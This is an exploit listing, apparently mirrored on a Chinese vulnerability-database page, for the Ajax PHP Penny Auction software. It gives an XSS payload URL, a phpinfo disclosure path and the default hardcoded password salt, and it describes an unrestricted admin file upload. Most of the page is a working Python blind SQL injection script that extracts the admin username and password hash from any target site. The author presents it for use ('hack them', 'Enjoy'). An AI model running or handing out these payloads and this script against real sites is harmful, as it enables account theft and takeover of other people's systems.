Ajax PHP Penny Auction 1.x 2.x multiple Vulnerabilities

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1044617 漏洞类型
发布时间 2013-08-13 更新时间 2013-08-13
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013080104
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
################################################################################
#          Ajax PHP Penny Auction 1.x 2.x multiple Vulnerabilities             #
#                       Found by : Taha Hunter                                 #
#Info :                                                                        #
#     Ajax PHP Penny Auction is one of the most proven and reliable            #
# Penny Auction software options available on the market. Based on a           #
#  proprietary AJAX Streaming Engine which has four years of                   #
#   refinement and debugging under its belt in real live site action.          #
#                                                                              #
#                                                                              #
#           website : http://www.ajaxphppennyauction.com/                      #
################################################################################
 
XSS :
 
http://[target]/forgotpasswd.php/"onmouseover='alert("XSS")'">
 
Phpinfo Information Disclosure :
 
http://[target]/phpinfo.php
 
Blind SQL Injection :
 
#!/usr/bin/pyhon
################################################################################
#                                                                              #
#            Ajax PHP Penny Auction version 1.x 2.x maybe oders                #
#                  item.php Blind SQL Injection Exploit                        #
#       if you can not beat autoclickers bots ==> hack them ;)                  #
#                   Found & Coded by : Taha Hunter                             #
#               By default there is a table suffix called                      #
#     PHPAUCTIONXL_ added to all table names you can remove it if its needed   #
#       The Password is like  form md5($salt.$password)                        #
#  the salt is hardcoded in /includes/config.inc.php by default its value is   #
#    $MD5_PREFIX = "This_Is_My_Random_String_For_The_MD5_Hash_Algorithm";      #
#                                                                              #
#File Upload :                                                                 #
#if you get the admin password you can upload arbitrary files from             #
#http://[target]/admin/homepage.php there is no check for file extention       #
#                                                                              #
#MySQL Integer SQLi :                                                          #
#http://[target]/admin/userbidhistoryauctions.php?id=65'                       #
#you must first be logged as admin probably more vulnerablities still there..  #
#                                                                              #
#                                                                              #
# Usage : python ajaxphpa.py -u http://www.target.com/item.php?id=[a valid id] #
#                                                                              #
#                                                                              #
#       Greetz to : Mehdi,Esac,Issam,Ali,Haitam,Imad and all friends ;)        #
#                                                                              #
#                                                                              #
#                   Contact me : vastmerdown@gmail.com                         #
#                                                                              #
################################################################################
 
 
import urllib2
from threading import Thread
from time import sleep
from optparse import OptionParser
print "#######################################################################"
print "#                                                                     #"
print "#      Ajax PHP Penny Auction 1.x 2.x Blind SQL Injection Exploit     #"
print "#                                                                     #"
print "#             Found & Coded by : Taha Hunter                          #"
print "#                                                                     #"
print "#           Contact me : vastmerdown@gmail.com                        #"
print "#                                                                     #"
print "#python ajaxphpa.py -u http://www.target.com/item.php?id=[a valid id] #"
print "#                                                                     #"
print "#######################################################################"
print ""
print ""
name = ""
admin_user = ""
admin_password = ""
strinng=[]
def valid_test(url,type,val,sig):
    yep = urllib2.urlopen(url+type+sig+str(val)).read()
    if keyword in yep:
        return 1
    else:
        return 0
 
def start_guessing(url,type,guess_type):
        total = 0
        n_guess = 0
        fixer = 0
        max = 255
        string =""
        guess = int(max)/2
        while(total != 9):
            if(valid_test(url, type,guess, '>')):   
                fixer = guess
                n_guess = int(guess + ((max - fixer)/2))
            if(valid_test(url,type, guess, '<')):
                max = guess
                n_guess = int(guess - ((max - fixer)/2))
      
            if(valid_test(url, type,guess, '=')):
                if guess_type == 'len':
                    return guess
                if guess_type == 'ascii':
                    return chr(guess)
            guess = n_guess
            total += 1
def loader(id,strinng,url,type,guess_type,lenn):
    strinng[id] =start_guessing(url,type,guess_type)
keyword = "item_watch.php?add="
db_len = "%20and%20Length((database()))"
usage = 'usage: %prog -u http://[target]/item.php?id=[a valid id]'
parser = OptionParser(usage=usage)
parser.add_option("-u", action="store", type="string", dest="url1", help='"http://[target]/item.php?id=1080"')
(options, args) = parser.parse_args()
if(options.url1):
    url = options.url1
else:
    print "[-] Please insert a valid URL !"
    exit()
print "[+] Connecting to site"
req = urllib2.urlopen(url).read()
if not keyword in req:
    print "[-] Please use a valide ID for the link !"
    exit()
''' #If you want to know DB Name
print "[+] Finding Database Name Length"
lenn = start_guessing(url,db_len,'len')
print "[+] DB length is ==> "+str(lenn)
print "[+] Finding Database Name"
for a in range(lenn):
        strinng.append('1337')
for i in range(1,lenn+1):
    db_name ="%20and%20ascii(substring((database())%2C"+str(i)+"%2C1))"
    Thread(target=loader,args=[i-1,strinng,url,db_name,'ascii',lenn]).start()
while '1337' in strinng:
    sleep(3)
    #print strinng #incomment this line if you want to see progression
    continue
for i in range(len(strinng)):
    name += strinng[i]
print "[+] Database Name is ==> " + name
'''
un_len = "%20and%20Length((select%20username%20from%20PHPAUCTIONXL_adminusers%20limit%200%2C1))"
pass_len ="%20and%20Length((select%20password%20from%20PHPAUCTIONXL_adminusers%20limit%200%2C1))"
print "[+] Finding Username Length may take a while..."
lenn = start_guessing(url,un_len,'len')
print "[+] Done ."
del strinng[:]
for a in range(lenn):
        strinng.append('1337')
print "[+] Extracting Username may take a while..."
for i in range(1,lenn+1):
    username = "%20and%20ascii(substring((select%20username%20from%20PHPAUCTIONXL_adminusers%20limit%200%2C1)%2C"+str(i)+"%2C1))"
    Thread(target=loader,args=[i-1,strinng,url,username,'ascii',lenn]).start()
while '1337' in strinng:
    sleep(3)
    #print strinng # incomment this line if you want to see progression
    continue
for i in range(len(strinng)):
    admin_user += strinng[i]
print "[+] Found ! Username is ==> " +admin_user
print "[+] Finding Password Length may take a while..."
lenn = start_guessing(url,pass_len,'len')
print "[+] Done ."
del strinng[:]
for a in range(lenn):
        strinng.append('1337')
print "[+] Extracting Password may take a while..."
for i in range(1,lenn+1):
    password = "%20and%20ascii(substring((select%20password%20from%20PHPAUCTIONXL_adminusers%20limit%200%2C1)%2C"+str(i)+"%2C1))"
    Thread(target=loader,args=[i-1,strinng,url,password,'ascii',lenn]).start()
while '1337' in strinng:
    sleep(3)
    #print strinng #incomment this line if you want to see progression
    continue
for i in range(len(strinng)):
    admin_password += strinng[i]
print "[+] Found ! Password is ==> " +admin_password
print "[+] Username => "+admin_user+" Password : => "+admin_password
print "[+] Done Enjoy !"